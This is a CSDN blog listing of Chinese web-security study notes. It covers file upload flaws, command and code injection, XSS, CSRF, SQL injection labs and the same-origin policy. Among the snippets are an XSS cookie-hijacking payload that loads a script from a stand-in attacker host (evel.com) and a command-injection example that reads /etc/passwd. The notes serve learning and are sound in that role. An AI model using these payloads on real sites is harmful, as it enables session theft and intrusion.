![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
CPriLuke
享受技术,‘漫漫’积累
展开
-
白帽子(6)- 造成文件上传漏洞原因有哪些?
服务器配置不当当服务器配置不当,在不需要上传页面的情况下便可导致任意文件上传,如开启HTTP PUT方法;开源编辑器上传漏洞…文本文件上传限制被绕过比如客户端做了限制,但服务器没有做,那只要修改数据包即可绕过过滤不严或绕过过滤一般采用黑后缀过滤, 如过滤php, 但上传php3后缀文件解析漏洞导致文件执行存在此漏洞时,及时合法的文件名,但文件名中的恶意代码也有可能被执行。比如read .txt文件,却执行了里面的脚本命令;文件路径截断如0x00,?, \0或超长..原创 2020-12-20 16:00:00 · 2194 阅读 · 0 评论 -
白帽子(5)- 命令注入与代码注入区别
命令注入当应用程序需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数,如php中的system, exec, shell_exec等,当用户可以控制名利执行函数中的参数是,将可注入系统名利到正常名利中,造成命令注入攻击,如system(args), args= ‘cat /etc/passwd’;代码注入应用程序在刁永杰一些能够将字符串转为代码的函数(如php中的eval)时, 没有考虑用户是否可以控制这个字符串,将造成代码执行漏洞,如(eval(“args”)); args=‘.原创 2020-12-20 15:44:26 · 1105 阅读 · 1 评论 -
白帽子(4)-csrf,ssrf, xss的区别
XSS攻击过程攻击者发现xss漏洞 → 构造代码 → 发送给受害人 → 受害者打开 → 攻击者获取受害人的cookie → 完成攻击攻击者:需要登录到后台完成攻击CSRF攻击过程攻击者发现xss漏洞 → 构造代码 → 发送给受害人 → 受害者打开 → 受害者执行代码 → 完成攻击总结: CSRF攻击者只负责构造代码,攻击由用户实现,CSRF少了cooke获取的步骤,为什么少了呢?因为受害人在执行恶意代码的时候就已经外成了攻击,而攻击者并没有参与进来...原创 2020-12-20 15:35:17 · 545 阅读 · 2 评论 -
白帽子(4)- xss payload
xss pyload直接参考:xss pyload攻击语句汇总cooke劫持一般放在script中。# 远程请求xss 文件url: http://a.com/test.html?abc="><script src=http://evel.com/eval.js ></script>"# evel.js的写法<script> var img = document.createElement("img"); img.src = "http://ev原创 2020-09-21 16:08:11 · 311 阅读 · 0 评论 -
白帽子(3)- xss反射与dom攻击对比
Dom XSS攻击关于xss攻击的分类可以参考以前的文章:xss分类,注意:对于DOM XSS类型的攻击与反射性的区别在于:DOM XSS是javascript处理输出, 而反射性xss是后台程序处理。示例与pyload如下:<script> function test() { var str = document.getElementById("text").value; document.getElementById("t").innerHTM原创 2020-09-21 16:07:22 · 2331 阅读 · 0 评论 -
使用dnslog进行sql注入
这里主要是补充一下ADO老师在对dnslog进行注入前,对于dnslog的补充说明:首先登陆http://ceye.io/注册一个账号,并进行登录,登录后在http://ceye.io/profile获取你的域名和token.测试自己的dnslog是否正常, 直接在网页发送http:在dnslog的http请求下查询是否存在有该记录:...原创 2020-07-12 16:55:10 · 692 阅读 · 0 评论 -
sql注入-回显注入实例详解
根据前面对sql注入流程的说明https://blog.csdn.net/CPriLuke/article/details/106961748本章主要对说明的内容通过实战的方式进一步加深,实战环境sqlilab,hackbar1. 寻找注入点通过注入单引号后,网站返回sql报错,确认存在SQL注入,且得知数据库的类型为MYSQL2. 确定当前数据库的列数通过order by进行试探得到,如下所示,当为order by 4返回数据报错sql注入语句说明,后台的原始数据为:select *原创 2020-06-26 09:56:06 · 1592 阅读 · 0 评论 -
sql注入-基本思路
环境搭建# docker搭建sqli-labsdocker pull acgpiano/sqli-labs# 运行sqli-labsdocker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs # 点击进去后reset 数据库sql注入流程1. 目标收集无特定目标: inurl:php?id=有特定目标:inurl:php?id= site:target.com工具爬取:spider爬取2. 寻找注入点寻找注入点的方式主原创 2020-06-25 23:31:29 · 913 阅读 · 0 评论 -
白帽子(2)-浏览器安全(同源策略)
浏览器安全章节重点是介绍了一下浏览器的安全功能,并列举了一下功能:同源策略同源策略(Same origin policy)限制了来自不同源的document或脚本,对当前的“document”读取或设置某些属性。所谓同源是指:域名、协议、端口相同。另外,同源策略又分为以下两种:DOM 同源策略:禁止对不同源页面 DOM 进行操作。这里主要场景是 iframe 跨域的情况,不同域名的 iframe 是限制互相访问的。XMLHttpRequest 同源策略:禁止使用 XHR 对象向不同源的服务器地址原创 2020-06-21 16:11:02 · 450 阅读 · 0 评论 -
白帽子(1)-web世界观
基本概念安全问题本质是信任问题设计安全方案的基础都是建立在信任关系上的,我们必须相信一些东西,必须有一些基本的假设,安全方案才能建立。安全是一个持续的过程安全是一个持续的过程,攻击方式在变,防御方式也在变安全要素CIA名称英文名说明机密性confidential要求保密的数据内容不能被泄露完整性integrity数据不能被篡改,是完整的可用性availability保护资源可以得到,DOS扩充的一些要素:可审计性和不可抵赖性原创 2020-06-21 12:02:58 · 366 阅读 · 0 评论 -
sqlmap 抓包没发现sql注入语句
原因:sqlmap中的.sqlmap目录下保存了上次信息, sqlmap再次探测直接使用了上次信息解决办法:rm 删除上次信息原创 2020-05-01 12:30:51 · 463 阅读 · 0 评论 -
web安全-SQL注入漏洞入门
SQL原理根因:服务器要执行的数据库代码拼接了用户输入的数据危害:被用来获取数据库敏感数据(拖库)SQL注入工具sqlmap --kali有现成的支持数据库多支持多个字段cookie, args等字段的注入#如何判断一个注入点: sqlmap -uSQL基本流程找到有数据交互的功能的页面,一般是一些脚本文件判断页面是否存在SQL注入在url...原创 2020-04-07 00:00:15 · 199 阅读 · 0 评论 -
web安全-敏感文件探测
常见的敏感文件类型网站管理后台:找到网站后台位置后进行口令爆破数据文件:如http://create.sql 获取到数据库文件备份文件:格式如wwwroot.tgz等网站备份文件webshell: 已经被攻陷的网站上的后门脚本如fuck.php, c.php等...原创 2020-04-05 18:25:09 · 751 阅读 · 0 评论 -
网易web安全:课后问题-CSRF
什么是CSRF利用用户已经登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作CSRF攻击原理用户登录web网站,此时浏览器含有用户登录信息黑客构造恶意网站用户主动访问恶意网页,转账到黑客用户。**真正完成转账的关键在于:**浏览器cookie存放有用户的登录凭证,当浏览器发送请求时,会继续带上已有的cookie恶意网页的构造技巧: 含有攻击的网页不会显示任何内容,只...原创 2020-02-23 11:25:12 · 329 阅读 · 1 评论 -
安全开发工程师-常用网站
开发相关linux库函数:http://www.qnx.com/developers/docs/6.5.0/index.jsp添加链接描述C++ Referrence:安全相关学习平台: https://live.freebuf.com/添加链接描述IBM漏洞知识整理: https://www.ibm.com/support/knowledgecenter/SSB2MG_4...原创 2020-02-21 19:30:36 · 359 阅读 · 0 评论 -
网易web安全五:课后问题-xxs
xxs概念黑客通过“html注入”篡改网页,插入了恶意的脚本,当用户浏览网页时,实现控制用户浏览器行为的一种攻击方式两个关键点:html包含恶意脚本, 黑客获取到用户cookie常规工具:在查看前端攻击时,可以使用firebug进行查看hash数据比如下图:当加载一个img失败时,执行onerror事件从而执行xss脚本xss分类**存储型:**需要经历两个步骤1) 用户将xss脚...原创 2020-02-18 01:03:14 · 285 阅读 · 0 评论 -
dvwa登录失败-login failed
密码:admin/adminadmin/password原创 2020-02-16 18:00:05 · 7578 阅读 · 6 评论 -
网易web安全:课后问答-php
什么是php?php是服务器后端解释器语言php变量中$_POST $_GET $_FILE 用法如下面截图中用法php include的用法include xxx.phpphp 如何操作数据库百度一下就可以,easy...原创 2020-02-16 16:34:54 · 176 阅读 · 0 评论 -
网易web安全五:课后问题-SQL操作
phpstudy 如何运行后台mysql找到mysql目录将bin/目录下的mysql.exe拖动到命令行后,输入如下命令:.../mysql.exe -uroot -p[yourpasswd] mysql常见的内置函数主要记住:select current_user; select datebase(); select load_file('') #查看外部文件 select ve...原创 2020-02-16 15:54:02 · 212 阅读 · 0 评论 -
网易web安全五:课后问题-web服务器
web的动态页面大致解析以php语言为例:请求-web服务器-php解释器解析php文本-数据库查询返回结果-解释器生成html,业内相关网站web服务端包含哪两种服务如上图所示包含:web服务和数据库服务本地访问,四种访问网站的形式有哪些?本地主机:localhost127.0.0.1本机IP地址域名,需要修改hosts文件如何运行一个简单的web文件将html或ph...原创 2020-02-16 15:19:19 · 284 阅读 · 0 评论 -
网易web安全四:课后问题-javascript
在那些地方使用javascript简单记忆: 如何获取html的内容,这也是dom的作用如果是写入就是:document.wirte(), 链接写入图片:document.write("<img src = 'https://pic2.zhimg.com/v2-7d1f94a55f2aea205ca6f195c557a041_250x0.jpg'></img>")...原创 2020-02-16 14:06:45 · 233 阅读 · 0 评论 -
网易web安全三:课后问题-前端开发基础HTML
web页面通常使用哪几种语言开发html: 网页格式javascript: 动态扩展css: 网页格式渲染Html结构包含哪两部分head和body,结构体如下HTML元素由哪几部分组成开始标签,属性,元素内容,结束标签常见的HTPM标签,头部等HTML DOM是什么结构是用javascript操纵HTML元素的会后结构体,一般为树形结构...原创 2020-02-16 13:28:21 · 184 阅读 · 0 评论 -
网易web安全二: 课后问题-web通信
URL是什么,有什么作用Uniform Resource Locator,统一资源定位符,它是WWW的统一资源定位标志,就是指网络地址描述URL的格式除了http协议,ftp, smb等协议的资源定位也采用url形式HTTP报文结构请求:请求行 + headers + body响应:状态行 + headers + body请求方向需要注意referer字段(指向网站来源), coo...原创 2020-02-16 13:12:08 · 221 阅读 · 0 评论 -
网易web安全一:课后问题-web介绍
web是什么?就是网站上网,web经历web1.0: 个人网站,门户站点, 提供信息只能阅读,到web2.0有blog, 论坛,可以上传文件;根据web发展史,定义常规的web攻击方式根据前端和后端定义攻击方式web工作流程参考上图即可浏览器是如何工作的先请求dns站点获取ip地址,然后根据ip地址对服务器发起请求,最后将响应到的html或php进行渲染得到新的网页...原创 2020-02-16 10:32:18 · 240 阅读 · 0 评论